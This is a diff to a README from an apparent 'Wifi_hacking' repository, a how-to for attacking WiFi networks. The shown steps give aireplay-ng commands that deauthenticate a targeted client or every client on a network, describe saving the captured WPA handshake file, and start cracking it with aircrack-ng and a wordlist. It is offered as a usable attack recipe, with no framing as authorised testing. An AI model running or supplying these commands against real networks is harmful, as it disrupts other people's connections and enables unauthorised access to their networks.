Esther7171/Wifi_hacking/README.md

 ```bash
 aireplay-ng wlan0 -a 3C:46:45:1D:5D:31 -c D4:36:89:A4:7R:29 --deauth 10
 ```
-# To dos on whole network use :
+# To deauth on whole network use :
 ```bash
 aireplay-ng wlan0 -a <bssid> -0 <deauth n.o packages>
 ```
+## your handshake-file will be stored in the path u give
+- .cap  is the file fo capture handshake .
+In my case is Meow.txt.cap
+- so we going to crack it by aircrack-ng with wordlists.
 # step 5.
 Crack the password / handshake file.
 ### To crack capture handshake we using aircrack-ng fast cracking tool
 * -w to give wordlist.